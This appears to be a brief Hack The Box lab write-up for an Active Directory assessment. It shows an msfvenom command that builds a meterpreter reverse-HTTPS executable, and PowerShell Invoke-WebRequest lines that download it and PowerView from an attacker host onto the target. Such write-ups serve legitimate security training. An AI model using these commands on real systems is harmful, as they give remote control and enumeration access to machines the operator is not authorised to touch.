HTB AD Enumeration & Attacks - Skills Assessment Part I

Browsing the uploads folder, we get the webshell.

We can directly get the flag from the desktop.

Now we need more interactive shell. So we will be using metasploit to gain back a shell.

msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.10.14.52 -f exe -o backupscript.exe LPORT=4444

Run the following command to upload the file.

Invoke-WebRequest -Uri "http://10.10.14.52:8000/backupscript.exe " -OutFile "C:\windows\system32\inetsrv\backup.exe"

Now run it

we will get the shell

Now we need to upload the tools

Invoke-WebRequest -Uri "http://10.10.14.124:8000/PowerView.ps1 " -OutFile "C:\PowerView.ps1"

Last updated 28 days ago